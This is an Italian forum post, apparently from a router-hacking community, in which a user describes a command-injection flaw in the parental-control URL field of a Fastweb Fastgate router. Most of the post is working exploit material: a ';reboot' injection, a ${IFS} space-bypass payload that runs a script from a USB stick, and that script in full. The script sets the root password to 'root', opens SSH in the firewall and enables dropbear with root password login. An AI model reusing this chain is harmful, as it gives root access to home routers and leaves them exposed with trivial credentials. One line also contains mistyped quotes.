1
Presentazione -OBBLIGATORIA- per i Nuovi Iscritti / Ciao
« Ultimo post da jojo1234 il Ieri alle 18:49 »Ciao a tutti
Potrei aver trovato qualcosa di interessante, ma non so come sfruttare la falla, sul parental control inserendo come urle quindi con il comandoCodice: [Seleziona];reboot
il fastgate si riavvia, quindi penso che quel campo sia iniettabile... Ma essendo il formato originale di un link non accetta stringhe con spazi, sono riuscito solo a riavviarlo... Ho pensato di fargli eseguire uno script da chiavetta, ma non riesco a farlo senza usare spazi
;sh${IFS}/tmp/run/mountd/sda1/sblocco.sh
e possibile eseguire un file "sblocco.sh" da una chiavetta USB.#!/bin/sh
echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab
uci -q set \$(uci show firewall | grep -m 1 \$(fw3 -q print | \
egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment \"!fw3: .+\" -j DROP' | \
sed -n -e 's/^iptables.\+fw3: \(.\+\)\".\+/\1/p') | \
sed -n -e \"s/\(.\+\).name='.\+'$/\1/p\").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci set dropbear.global.enable=‘1’
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart